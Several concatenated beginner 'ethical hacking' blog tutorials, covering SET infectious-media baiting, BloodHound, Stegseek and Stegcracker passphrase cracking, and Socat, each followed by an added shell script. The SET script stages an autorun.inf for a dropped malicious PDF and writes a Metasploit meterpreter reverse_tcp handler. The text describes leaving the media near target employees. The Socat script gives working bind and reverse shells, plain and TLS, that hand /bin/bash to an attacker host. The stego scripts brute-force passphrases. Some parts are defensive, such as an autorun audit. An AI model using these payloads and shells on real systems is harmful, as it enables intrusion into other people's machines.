
Social Engineering Toolkit (SET): Beginners guide

Hello, aspiring ethical hackers. In our previous article, you learnt what social engineering is and the various types of social engineering attacks. In this article, you will learn about the Social Engineering Toolkit (SET), an open-source penetration testing framework designed for performing a wide range of social engineering attacks.

Let’s see how this tool works. For this, we will be using Kali Linux, as SET is installed by default on it. You can start SET with the command shown below.

sudo setoolkit

When it prompts you to agree to “terms of services”, type “Y”.

Then the primary menu of Social Engineering Toolkit is displayed to you.

The primary menu of SET is divided into seven sections. The first one consists of all the social engineering attacks that you can perform with SET.

These include attacks like spear phishing, website-based phishing, infectious media and so on. The second one consists of the penetration testing (Fast-Track) attacks, such as MSSQL brute forcing.

Third in the list are the third-party modules included in SET.

These include the Google Analytics attack, the RATTE attack and others.

The remaining options are used to update SET, update the SET configuration, show help and credits, and exit SET respectively.

Now, let’s see how to perform an attack with SET. For this blogpost, let’s create infectious media. In an infectious media attack, a medium like a DVD, CD or USB drive is loaded with a malicious payload and left close to the intended target users. Also called a road apple (or baiting) attack, the idea is that an employee may be enticed by the free media they found and insert it into an office device to check what it contains. In an infectious media attack, the payload hosted on the media is configured to run automatically as soon as the device is inserted. This is done by including an AUTORUN.INF file along with the payload. Note that Windows has disabled AutoRun for USB drives by default since Windows 7 (and the 2011 update for earlier versions), so on modern targets the user usually has to open the file themselves; the payload still works, only the automatic launch is lost.

To create this attack, select option 3 (Infectious Media Generator) in the menu of social engineering attacks.

This module creates a Metasploit payload along with an “AUTORUN.INF” file.

Select the first option, the file-format exploit method. After selecting this, you need to enter the IP address for the reverse connection (the listener IP address). SET will then prompt you to select the file format you want your payload to take.

By default, it uses the PDF embedded EXE, in which an EXE file is embedded inside a PDF file. I will go with the default option. Next, it will ask whether you want to use your own PDF or a built-in blank PDF for this attack.

For a higher success rate with this attack vector, it is highly recommended to use a custom PDF, since a blank document gives the target no reason to open it. However, for this tutorial, I will use the default blank PDF. It’s time to select the payload.

Select the payload you want and assign the listener IP and listener port. These are filled in automatically by SET. If you want to make any changes, you can make them; otherwise, just hit ENTER.

You can start the listener immediately from SET or later through Metasploit. The payload and the AUTORUN.INF file are saved in the autorun folder under SET’s home directory (the path is printed when the attack is generated). The attack vector is saved with the name “template.pdf”. This file along with the AUTORUN.INF file need to be placed on the media of your choice (CD/DVD/USB), which completes the infectious media attack.
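The steps that follow SET’s generator (staging the two files on the media and starting the handler) are shown below as an added example; this is not code from the original post or from SET itself. It assumes the payload windows/meterpreter/reverse_tcp, a listener at 192.168.1.10:443, and that SET wrote its output to ~/.set/autorun; all three are placeholders, and the autorun.inf written here uses the shellexecute= key rather than whatever SET itself emits. The last function is the defender’s side of the same file: it reads an autorun.inf back from a mounted drive and reports what it would launch.

```shell
#!/bin/sh
# Added example (not from the original post or from SET): stage SET's output
# onto removable media, prepare the Metasploit handler, and audit an
# autorun.inf found on a drive. Placeholder values: payload, LHOST/LPORT,
# SET output folder.

# Write an autorun.inf that asks AutoPlay to open the dropped PDF with its
# associated viewer. Windows expects CRLF line endings in this file.
# Caveat: AutoRun from USB media is off by default since Windows 7 (and the
# 2011 update for older versions), so on most targets the user still has to
# open the file by hand; the entry mainly matters for optical media.
write_autorun_inf() {       # write_autorun_inf <media dir> <file to launch>
    dir=$1 payload=$2
    printf '[autorun]\r\nshellexecute=%s\r\naction=Open folder to view files\r\n' \
        "$payload" > "$dir/autorun.inf"
}

# Copy the files SET generated onto the media. SET prints its output folder
# when the attack is generated; ~/.set/autorun is assumed here.
stage_media() {             # stage_media <media dir> [SET output dir]
    media=$1 setdir=${2:-"$HOME/.set/autorun"}
    mkdir -p "$media"
    cp "$setdir/template.pdf" "$media/"
    write_autorun_inf "$media" template.pdf
}

# Resource script for the listener, so it can be started later with:
#   msfconsole -q -r handler.rc
write_handler_rc() {        # write_handler_rc <LHOST> <LPORT> [outfile]
    lhost=$1 lport=$2 out=${3:-handler.rc}
    cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Defender's check: print what an autorun.inf on a mounted drive would launch
# (both the open= and shellexecute= keys), case-insensitively, ignoring CRLF.
audit_autorun() {           # audit_autorun <mount point>
    inf=$1/autorun.inf
    [ -f "$inf" ] || { echo "no autorun.inf on $1" >&2; return 1; }
    tr -d '\r' < "$inf" | grep -iE '^(open|shellexecute)=' | cut -d= -f2-
}

# Usage: sh thisfile.sh demo
if [ "${1:-}" = "demo" ]; then
    write_handler_rc 192.168.1.10 443 handler.rc
    tmp=$(mktemp -d)
    write_autorun_inf "$tmp" template.pdf
    audit_autorun "$tmp"    # prints the launch target: template.pdf
fi
```

Run `audit_autorun /media/usb0` (or wherever the drive is mounted) on any found media before touching its contents; an entry pointing at an executable or a document is exactly the road-apple setup described above.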

Learn how to perform a phishing attack with Weeman HTTP server and GoPhish.


Beginners guide to Bloodhound tool

Hello, aspiring ethical hackers. In this article, you will learn about Bloodhound, an open-source tool that helps in identifying attack paths and relationships in an Active Directory environment. It is also useful for uncovering hidden information about the domain and security misconfigurations in AD that would be very hard to find by inspecting objects one at a time. Bloodhound is one of the favorite tools of both red teams and blue teams.

Let’s see how this tool works. For this, we will be using Kali Linux, as Bloodhound is available in its repositories and can be installed with apt.

Once Bloodhound is installed successfully, you need to change the permissions of the “neo4j” folder as shown below. Neo4j is the native graph database that Bloodhound uses to store and query the collected data.

Next, we need to start the Neo4j console as shown below.

It prints the URL of its web interface (http://localhost:7474 by default). Open that URL in a browser. It will prompt you for authentication. The default username and password for logging into Neo4j are neo4j and neo4j.

Neo4j forces you to change this default password on first login, so set a new one now; Bloodhound will not be able to connect otherwise.

Now, the Neo4j database is all set. To start Bloodhound, use the command shown below.

bloodhound

The Bloodhound GUI (an Electron application, not a browser tab) should open with a login screen as shown below. Log in with the Neo4j username, the new password you set, and the Bolt URL it points at by default, bolt://localhost:7687.

An almost blank screen should welcome you as shown below.

Bloodhound is successfully installed and ready to be used. To see how this tool works, we first need to collect data from an Active Directory environment. This is done with a collector provided by the makers of Bloodhound, known as SharpHound, which runs on a domain-joined Windows host and writes its results to a zip archive of JSON files. Data can be collected using SharpHound as shown below.

However, SharpHound has been giving some errors while collecting data lately. See if it works for you. There is also some sample data available for download to see how Bloodhound works. This can be downloaded from here. This sample data, in the form of a zip archive, can be uploaded to Bloodhound as shown below.

Even uploading this data is posing some problems. But don’t worry, we will soon be updating this article. Please watch out for it.
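The setup and ingestion steps above can be checked from the command line, which helps when an upload fails without explanation. Below is an added example, not code from the original post or from the BloodHound project: it changes the default Neo4j password with cypher-shell, records the collector invocation for reference, and sanity-checks an unpacked SharpHound archive before it is dragged into the GUI. It assumes Neo4j 4.x or 5.x (where the ALTER CURRENT USER statement and the -d system option exist), Bolt on localhost:7687, a recent SharpHound whose JSON files end in a "meta" object with type, count and version fields, and the two sample files it writes are constructed here, not real collector output.

```shell
#!/bin/sh
# Added example (not from the original post or from BloodHound). Assumes
# Neo4j 4.x/5.x with cypher-shell, Bolt on localhost:7687, and SharpHound's
# JSON layout: {"data":[...],"meta":{"methods":..,"type":..,"count":..,"version":..}}

# Replace the default neo4j/neo4j credentials without opening the browser UI.
# The new password is interpolated into a Cypher string, so avoid quotes in it.
neo4j_set_password() {      # neo4j_set_password <new password>
    command -v cypher-shell >/dev/null 2>&1 || { echo "cypher-shell not installed" >&2; return 1; }
    cypher-shell -a bolt://localhost:7687 -u neo4j -p neo4j -d system \
        "ALTER CURRENT USER SET PASSWORD FROM 'neo4j' TO '$1';"
}

# The collector runs on a domain-joined Windows host, not on Kali. For a
# recent SharpHound the call is:  SharpHound.exe -c All --zipfilename corp.zip
# Unzip the result and point the functions below at the directory.

# Print "<type> <count>" for every JSON file, reading only the trailing meta
# object so that nothing inside the data array is ever misparsed.
sharphound_summary() {      # sharphound_summary <unpacked dir>
    for f in "$1"/*.json; do
        [ -f "$f" ] || continue
        meta=$(grep -o '"meta":{[^}]*}' "$f" | tail -n 1)
        otype=$(printf '%s' "$meta" | grep -o '"type":"[^"]*"' | cut -d'"' -f4)
        count=$(printf '%s' "$meta" | grep -o '"count":[0-9]*' | cut -d: -f2)
        printf '%s %s\n' "${otype:-?}" "${count:-?}"
    done
}

# Fail unless every file carries a meta block and all files report the same
# collector version; mixed or truncated files are a common cause of uploads
# that silently do nothing in the GUI.
sharphound_check() {        # sharphound_check <unpacked dir>
    versions=$(for f in "$1"/*.json; do
        [ -f "$f" ] || continue
        grep -o '"meta":{[^}]*}' "$f" | tail -n 1 | grep -o '"version":[0-9]*' | cut -d: -f2
    done | sort -u)
    n=$(printf '%s\n' "$versions" | grep -c . || true)
    [ "$n" -eq 1 ] && ! sharphound_summary "$1" | grep -q '?'
}

# Constructed sample in the SharpHound layout (not real collector output),
# used to exercise the two checks above offline.
make_sample() {             # make_sample <dir>
    mkdir -p "$1"
    printf '%s\n' '{"data":[{"ObjectIdentifier":"S-1-5-21-1-2-3-1105","Properties":{"name":"ALICE@CORP.LOCAL","enabled":true}},{"ObjectIdentifier":"S-1-5-21-1-2-3-1106","Properties":{"name":"BOB@CORP.LOCAL","enabled":false}}],"meta":{"methods":0,"type":"users","count":2,"version":5}}' > "$1/users.json"
    printf '%s\n' '{"data":[{"ObjectIdentifier":"S-1-5-21-1-2-3-1000","Properties":{"name":"DC01.CORP.LOCAL"}}],"meta":{"methods":0,"type":"computers","count":1,"version":5}}' > "$1/computers.json"
}

# Usage: sh thisfile.sh demo
if [ "${1:-}" = "demo" ]; then
    d=$(mktemp -d)
    make_sample "$d"
    sharphound_summary "$d"         # computers 1 / users 2
    sharphound_check "$d" && echo "archive looks consistent"
fi
```

Run `sharphound_summary` on the unpacked zip before uploading: a type of "?" means the file has no meta block (usually a truncated download or a non-SharpHound file in the archive), and differing versions mean data from two collector releases was mixed, both of which BloodHound will reject or ignore.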


Complete guide to Stegseek

Hello, aspiring ethical hackers. In our previous blogposts, you learnt what steganography is, its uses and how to hide secret data in an image using the tool Steghide. In this blogpost, you will learn about a tool that can retrieve this hidden data from an image. The tool’s name is Stegseek.

Although Stegseek works the same way as Stegcracker (it brute-forces the Steghide passphrase with a wordlist), it is a lightning-fast Steghide cracker that is thousands of times faster than other crackers and can run through the entirety of the rockyou.txt wordlist in under 2 seconds. Let’s see how this tool works. For this article, we will be using Kali Linux as our attacker system, as this tool is available on Kali Linux. For the steganography attack, we will be using the same image in which we hid data using Steghide, “Volcano_with_Secret.jpg”.

All you need to do to retrieve the hidden information from the image with this tool is to supply the path of the image as shown below.

The “-sf” option stands for stego file, the file that carries the hidden information.

As you can see in the output above, Stegseek cracked the password (123456) of this file and successfully retrieved the hidden data, at lightning speed. The retrieved data is saved in a file named after the stego file with “.out” appended (here, Volcano_with_Secret.jpg.out). By default, Stegseek uses the rockyou.txt wordlist (/usr/share/wordlists/rockyou.txt on Kali) to brute-force the password.

Specify a different wordlist (-wl)

We can specify a different dictionary or wordlist if needed with this option.

Select file name for extracting data (-xf)

As you already read at the beginning of this article, Stegseek saves the retrieved hidden data to a file named “<name-of-the-file>.out”. To extract the hidden data to a different file, we can use this option. For example, let’s save the retrieved data to a file named “secret.txt” as shown below.

Overwrite existing file (-f)

In the output above, when we extracted the hidden information to a file named “secret.txt”, we were warned that a file with the same name already exists and asked whether we wanted to overwrite it. With this option, Stegseek overwrites an existing file without asking, which is what you want when running it from a script.

Get detailed output (-v)

This option gives detailed output while Stegseek is running.

Quiet mode(-q)

On the contrary, you can run Stegseek in quiet mode. In this mode it only displays the cracked password of the file as shown below and, of course, still retrieves the hidden data. Status updates and other output are not displayed.

Skip defaults (-s)

Specifying this option skips the default guesses that Stegseek normally adds to the wordlist, such as the empty password and the name of the file.

Number of threads (-t)

By default, Stegseek uses as many threads as the machine has CPU cores (4 on the system used here). The number of threads can be increased or decreased with this option, though going beyond the core count rarely helps because the cracking is CPU-bound. For example, let’s set the number of threads to 10.


Complete guide to Stegcracker

Hello, aspiring ethical hackers. In our previous blogposts, you learnt what steganography is, its uses and how to hide secret data in an image using the tool Steghide. In this blogpost, you will learn about a tool that can retrieve hidden data from an image. The tool’s name is Stegcracker.

Stegcracker is a steganography brute-force utility to uncover hidden data inside files. Note that its author has since marked the project as deprecated in favor of Stegseek (covered in a separate article), but it still works. Let’s see how this tool works. For this article, we will be using Kali Linux as our attacker system, as this tool is available in its repositories. For the steganography attack, we will be using the same image in which we hid data using Steghide, “Volcano_with_Secret.jpg”.

Check version (-v)

It is good practice to check the version of a tool before doing anything with it. You can check the version of Stegcracker using this option.

All you need to do to retrieve the hidden information from the image with this tool is to supply the path of the image as shown below.

As you can see in the output above, Stegcracker cracked the password (123456) of this file and successfully retrieved the hidden data too. The retrieved data is saved in a file named after the stego file with “.out” appended (here, Volcano_with_Secret.jpg.out). By default, Stegcracker uses the rockyou.txt wordlist to brute-force the password.

Specify a different wordlist

We can specify a different dictionary or wordlist if needed by passing its path as the second argument after the file name, as shown below.

Verbose output (-V)

This option can be used to get detailed output from Stegcracker.

Quiet mode(-q)

On the contrary, you can run Stegcracker in quiet mode. In this mode it only displays the cracked password of the file as shown below and, of course, still retrieves the hidden data. Status updates and other output are not displayed.

Number of threads (-t)

By default, Stegcracker uses 16 threads while running. The number of threads can be increased or decreased with this option; more threads help only as long as there are CPU cores to run them. For example, let’s increase the number of threads to 32.

Saving the output (-o)

As you already read at the beginning of this article, Stegcracker saves the retrieved hidden data to a file named “<name-of-the-file>.out”. This can be changed using the “-o” option.

For example, let’s save the retrieved data to a file named “secret.txt” as shown below.
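The Stegseek and Stegcracker walkthroughs above both boil down to the same round trip: hide data with Steghide, recover the passphrase with a wordlist, compare the extracted file with the original. The script below is an added example, not code from either article or from the Stegseek/Stegcracker projects, that wraps that round trip for both tools. It assumes steghide, stegseek and stegcracker are on PATH (each step is skipped when they are not), that the caller supplies a cover image, and that Stegseek prints its result as `[i] Found passphrase: "..."` as shown in the Stegseek README. The wordlist function also shows what the “default guesses” that Stegseek’s -s option disables look like in practice.

```shell
#!/bin/sh
# Added example (not from the original posts or from Stegseek/Stegcracker).
# Assumes: steghide, stegseek, stegcracker on PATH (skipped when absent), a
# cover image supplied by the caller, Stegseek's "[i] Found passphrase:" line.

have() { command -v "$1" >/dev/null 2>&1; }

# Hide a secret with the passphrase we will later recover
# (steghide: -cf cover file, -ef file to embed, -p passphrase, -q quiet).
embed_secret() {            # embed_secret <cover.jpg> <secret.txt> <passphrase>
    steghide embed -cf "$1" -ef "$2" -p "$3" -q
}

# Wordlist built from the stego file's own name plus a few stock passwords.
# Filename-derived guesses are the kind Stegseek adds by itself (and that its
# -s option turns off); listing them explicitly makes the attempt reproducible.
make_wordlist() {           # make_wordlist <stegofile> <out.txt>
    name=$(basename "$1")
    stem=${name%.*}
    printf '%s\n' "$name" "$stem" "$(printf '%s' "$stem" | tr 'A-Z' 'a-z')" \
                  password 123456 secret qwerty | sort -u > "$2"
}

# Stegseek: -sf stego file, -wl wordlist, -xf extract to, -f overwrite.
crack_stegseek() {          # crack_stegseek <stegofile> <wordlist> <outfile>
    stegseek -sf "$1" -wl "$2" -xf "$3" -f
}
# Tip: "stegseek --seed <file>" tells you whether a file holds steghide data
# at all (and how much) without knowing the passphrase.

# Stegcracker: positional file and wordlist, -o for the output file.
crack_stegcracker() {       # crack_stegcracker <stegofile> <wordlist> <outfile>
    stegcracker "$1" "$2" -o "$3"
}

# Pull the passphrase out of Stegseek's report, e.g.
#   [i] Found passphrase: "123456"
parse_passphrase() {        # reads stegseek output on stdin
    sed -n 's/.*Found passphrase: "\(.*\)".*/\1/p' | head -n 1
}

# End-to-end check on a cover image the caller supplies. Returns 0 when the
# recovered passphrase and payload match, or when the tools are missing (skip).
demo() {                    # demo <cover.jpg>
    cover=$1 pass=123456
    if ! have steghide || ! have stegseek || [ ! -f "$cover" ]; then
        echo "steghide/stegseek or cover image missing, skipping demo" >&2
        return 0
    fi
    work=$(mktemp -d)
    cp "$cover" "$work/Volcano_with_Secret.jpg"
    printf 'the secret\n' > "$work/secret.txt"
    embed_secret "$work/Volcano_with_Secret.jpg" "$work/secret.txt" "$pass"
    make_wordlist "$work/Volcano_with_Secret.jpg" "$work/words.txt"
    found=$(crack_stegseek "$work/Volcano_with_Secret.jpg" "$work/words.txt" \
                "$work/out.txt" 2>&1 | parse_passphrase)
    [ "$found" = "$pass" ] && cmp -s "$work/secret.txt" "$work/out.txt"
}

# Usage: sh thisfile.sh Volcano.jpg
[ -n "${1:-}" ] && demo "$1" && echo "passphrase recovered and payload matches"
```

Swap `crack_stegseek` for `crack_stegcracker` in `demo` to time the two tools against the same file; with rockyou.txt the difference is seconds versus hours, which is why the Stegcracker author now points users at Stegseek.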


Beginners guide to Socat

Hello, aspiring ethical hackers. In our previous blogpost, you learnt how to use netcat for various purposes in ethical hacking. In this blogpost, you will learn about another such tool named Socat.

Socat, short for SOcket CAT, is a command line utility that relays data bidirectionally between two independent data channels. Each end can be a file, a pipe, a device, a program (EXEC) or a network socket, and it supports many protocols including TCP, UDP, SOCKS4 and OpenSSL.

Bind and Reverse shells

Socat comes into play after you have gained access to a target network or device. Here, it helps you maintain access by serving as a channel for communication.

Let’s see how to create bind shells with socat (learn about different types of shells). For this, we will be using Metasploitable2 as the target system in our virtual hacking lab. Note that socat should be installed on both the target and attacker systems for this to work. To create a bind shell, run the listener command on the target system as shown below; it listens on a port and hands each incoming connection a shell.

Then, on the attacker system, we connect to that port with the command shown below.

Here’s our bind shell.

To create a reverse shell, the roles are swapped: the attacker system listens and the target system connects out, attaching its shell to the connection. This gets through a firewall that blocks inbound connections to the target but allows outbound ones.

Here’s our reverse shell.

Encrypted bind and reverse shell with socat

The above shells, although they work, transfer data in plain text, which is susceptible to sniffing and detection by network monitoring. No problem, though: socat can wrap the shell in TLS using OpenSSL.

To create an encrypted shell, we first need to create a self-signed SSL certificate and key as shown below. Two files with the extensions “.crt” and “.key” are created.

Then, we need to join these two files into one file with the “.pem” extension as shown below; socat expects the key and certificate together in a single file.

This file should be on the system on which we start our listener. For example, to create a bind shell, “ssl.pem” should be on the target system. Then we need to run the command shown below.

Then, on the attacker system, we run the command shown below.

Here’s the shell.

Similarly, we can also create an encrypted reverse shell, with the PEM file on the attacker system since that is where the listener runs.

File transfer

Socat can also be used to transfer files between two machines. For example, to transfer the SSL certificate we created above from the attacker system to the target system, the command to be run on the attacker system is shown below.

Then, on the target system, we run this command.
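All of the socat command pairs discussed above (plain bind and reverse shells, their OpenSSL-wrapped variants, and the file transfer) are collected below as shell functions, with a loopback self-test of the encrypted transfer so the certificate and the syntax can be checked on one host before using them between two machines. This is an added example, not code from the original post; the port numbers 4444 and 4443, the file names ssl.key/ssl.crt/ssl.pem, the 2048-bit RSA key valid for 365 days and the use of /bin/bash on the shell side are choices made here, not on the page. socat and openssl are assumed to be installed; the self-test skips when socat is missing.

```shell
#!/bin/sh
# Added example (not from the original post). Assumed: ports 4444/4443,
# ssl.key/ssl.crt/ssl.pem in the current directory, socat and openssl on PATH.

PLAIN=4444
TLS=4443
SHELL_OPTS="pty,stderr,setsid,sigint,sane"   # gives the remote side a usable tty

# --- Plain shells: whichever side runs EXEC: gives up its shell ---------------
bind_shell_target()      { socat TCP-LISTEN:$PLAIN,reuseaddr,fork EXEC:/bin/bash,$SHELL_OPTS; }
bind_shell_attacker()    { socat FILE:"$(tty)",raw,echo=0 TCP:"$1":$PLAIN; }        # $1 = target IP
reverse_shell_attacker() { socat FILE:"$(tty)",raw,echo=0 TCP-LISTEN:$PLAIN,reuseaddr; }
reverse_shell_target()   { socat TCP:"$1":$PLAIN EXEC:/bin/bash,$SHELL_OPTS; }      # $1 = attacker IP

# --- Encrypted variants: same shape, OPENSSL addresses, PEM on the listener ----
make_pem() {                # make_pem [dir]: self-signed cert + key, joined for socat
    d=${1:-.}
    openssl req -x509 -newkey rsa:2048 -nodes -days 365 -subj "/CN=socat" \
        -keyout "$d/ssl.key" -out "$d/ssl.crt" 2>/dev/null
    cat "$d/ssl.key" "$d/ssl.crt" > "$d/ssl.pem"
}
check_pem() {               # both halves must be present in the joined file
    grep -q 'BEGIN CERTIFICATE' "$1" && grep -q 'PRIVATE KEY' "$1"
}
tls_bind_shell_target()      { socat OPENSSL-LISTEN:$TLS,cert=ssl.pem,verify=0,reuseaddr,fork EXEC:/bin/bash,$SHELL_OPTS; }
tls_bind_shell_attacker()    { socat FILE:"$(tty)",raw,echo=0 OPENSSL:"$1":$TLS,verify=0; }
tls_reverse_shell_attacker() { socat FILE:"$(tty)",raw,echo=0 OPENSSL-LISTEN:$TLS,cert=ssl.pem,verify=0,reuseaddr; }
tls_reverse_shell_target()   { socat OPENSSL:"$1":$TLS,verify=0 EXEC:/bin/bash,$SHELL_OPTS; }

# --- File transfer (-u = one direction, left to right) -------------------------
serve_file()     { socat -u FILE:"$1" TCP-LISTEN:$PLAIN,reuseaddr; }                  # run first, on the sender
fetch_file()     { socat -u TCP:"$1":$PLAIN OPEN:"$2",creat,trunc; }                  # $1 sender IP, $2 destination
tls_serve_file() { socat -u FILE:"$1" OPENSSL-LISTEN:$TLS,cert="$2",verify=0,reuseaddr; }   # $2 = PEM
tls_fetch_file() { socat -u OPENSSL:"$1":$TLS,verify=0 OPEN:"$2",creat,trunc; }

# Loopback self-test: build the PEM, push it to 127.0.0.1 over TLS, compare.
# Returns 0 on a matching copy, or when socat is not installed (skip).
selftest_transfer() {
    work=$(mktemp -d)
    make_pem "$work"
    check_pem "$work/ssl.pem" || return 1
    if ! command -v socat >/dev/null 2>&1; then
        echo "socat not installed, skipping transfer test" >&2; return 0
    fi
    tls_serve_file "$work/ssl.pem" "$work/ssl.pem" &
    pid=$!
    sleep 1
    tls_fetch_file 127.0.0.1 "$work/copy.pem"
    sleep 1
    kill "$pid" 2>/dev/null || true
    wait "$pid" 2>/dev/null || true
    cmp -s "$work/ssl.pem" "$work/copy.pem"
}

# Usage: sh thisfile.sh selftest
[ "${1:-}" = "selftest" ] && selftest_transfer && echo "encrypted loopback transfer OK"
```

One caveat the page does not mention: `verify=0` on the connecting side turns off certificate checking, so anyone who can intercept the connection can terminate the TLS themselves. When you control both ends, copy ssl.crt to the connecting side out of band and replace `verify=0` with `cafile=ssl.crt` (recent socat versions also check the certificate name, so set `commonname=socat` to match the CN used above) so that only your own listener is accepted.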